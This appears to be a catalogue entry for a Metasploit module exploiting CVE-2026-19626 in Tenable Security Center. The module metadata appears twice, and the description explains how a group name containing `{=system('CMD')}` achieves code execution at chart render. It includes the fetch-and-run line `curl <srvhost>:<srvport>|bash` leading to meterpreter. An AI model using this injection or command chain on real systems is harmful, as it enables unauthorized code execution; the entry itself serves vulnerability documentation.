Tenable Security Center Report Charting RCE
zetlyn/cve-metasploit exploit cve CVE-2026-19626 known 2026-08-13
Properties
| platform | Linux,Unixreceipt
What the source handed over{
"aliases": [],
"arch": "cmd",
"author": [
"h00die"
],
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"check": true,
"default_credential": false,
"description": "Tenable Security Center prior to 6.9.0 allows an authenticated,\n non-administrative user to achieve code execution as the web service\n account (tns) through report generation.\n\n A report definition's inline style is discarded at render (components\n rehydrate styles from the Style tables by styleID), so the payload is\n delivered through a label instead: a group created with the name\n `{=system('CMD')}` is accepted verbatim and becomes a pie sector\n label via a user/sumgroup query; `{label}` substitution runs BEFORE\n the eval loop, so the payload lands inside the format string and\n fires at chart render. Regular org users can create both; report\n launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.\n\n Payload constraints: the {=...} regex is non-greedy to the first\n closing brace, so the expression may not contain one, and PHP string\n interpolation applies; this module therefore injects only\n `curl <srvhost>:<srvport>|bash`\n (a bare host:port GETs / and bash reads the served script from\n stdin). The served script itself has no such limits, which the\n Linux Dropper target exploits with a fetch payload\n (cmd/linux/http/...) that downloads and execs a full native payload\n (e.g. x64 meterpreter) from the payload adapter's own listener on\n FETCH_SRVPORT.\n\n Report definitions are closed to administrators (creation returns\n error 163); supply credentials for a regular org user.\n\n Tested against SecurityCenter 6.7.2-14 on RHEL9.",
"disclosure_date": "2026-08-13",
"fullname": "exploit/linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"is_install_path": true,
"mod_time": "2026-08-25 09:35:26 +0000",
"name": "Tenable Security Center Report Charting RCE",
"needs_cleanup": null,
"notes": {
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Stability": [
"crash-safe"
]
},
"path": "/modules/exploits/linux/http/tenable_sc_report_charting_rce_cve_2026_19626.rb",
"platform": "Linux,Unix",
"post_auth": true,
"rank": 600,
"ref_name": "linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"references": [
"URL-https://www.tenable.com/security/tns-2026-22",
"CVE-2026-19626"
],
"rport": 443,
"session_types": false,
"targets": [
"Unix Command",
"Linux Dropper"
],
"type": "exploit"
} |
|---|---|
| rank | 600 Excellent. Cannot crash the service. A memory-corruption exploit does not qualify. receipt
What the source handed over{
"aliases": [],
"arch": "cmd",
"author": [
"h00die"
],
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"check": true,
"default_credential": false,
"description": "Tenable Security Center prior to 6.9.0 allows an authenticated,\n non-administrative user to achieve code execution as the web service\n account (tns) through report generation.\n\n A report definition's inline style is discarded at render (components\n rehydrate styles from the Style tables by styleID), so the payload is\n delivered through a label instead: a group created with the name\n `{=system('CMD')}` is accepted verbatim and becomes a pie sector\n label via a user/sumgroup query; `{label}` substitution runs BEFORE\n the eval loop, so the payload lands inside the format string and\n fires at chart render. Regular org users can create both; report\n launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.\n\n Payload constraints: the {=...} regex is non-greedy to the first\n closing brace, so the expression may not contain one, and PHP string\n interpolation applies; this module therefore injects only\n `curl <srvhost>:<srvport>|bash`\n (a bare host:port GETs / and bash reads the served script from\n stdin). The served script itself has no such limits, which the\n Linux Dropper target exploits with a fetch payload\n (cmd/linux/http/...) that downloads and execs a full native payload\n (e.g. x64 meterpreter) from the payload adapter's own listener on\n FETCH_SRVPORT.\n\n Report definitions are closed to administrators (creation returns\n error 163); supply credentials for a regular org user.\n\n Tested against SecurityCenter 6.7.2-14 on RHEL9.",
"disclosure_date": "2026-08-13",
"fullname": "exploit/linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"is_install_path": true,
"mod_time": "2026-08-25 09:35:26 +0000",
"name": "Tenable Security Center Report Charting RCE",
"needs_cleanup": null,
"notes": {
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Stability": [
"crash-safe"
]
},
"path": "/modules/exploits/linux/http/tenable_sc_report_charting_rce_cve_2026_19626.rb",
"platform": "Linux,Unix",
"post_auth": true,
"rank": 600,
"ref_name": "linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
"references": [
"URL-https://www.tenable.com/security/tns-2026-22",
"CVE-2026-19626"
],
"rport": 443,
"session_types": false,
"targets": [
"Unix Command",
"Linux Dropper"
],
"type": "exploit"
} |
Text
Tenable Security Center prior to 6.9.0 allows an authenticated,
non-administrative user to achieve code execution as the web service
account (tns) through report generation.
A report definition's inline style is discarded at render (components
rehydrate styles from the Style tables by styleID), so the payload is
delivered through a label instead: a group created with the name
`{=system('CMD')}` is accepted verbatim and becomes a pie sector
label via a user/sumgroup query; `{label}` substitution runs BEFORE
the eval loop, so the payload lands inside the format string and
fires at chart render. Regular org users can create both; report
launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.
Payload constraints: the {=...} regex is non-greedy to the first
closing brace, so the expression may not contain one, and PHP string
interpolation applies; this module therefore injects only
`curl <srvhost>:<srvport>|bash`
(a bare host:port GETs / and bash reads the served script from
stdin). The served script itself has no such limits, which the
Linux Dropper target exploits with a fetch payload
(cmd/linux/http/...) that downloads and execs a full native payload
(e.g. x64 meterpreter) from the payload adapter's own listener on
FETCH_SRVPORT.
Report definitions are closed to administrators (creation returns
error 163); supply credentials for a regular org user.
Tested against SecurityCenter 6.7.2-14 on RHEL9.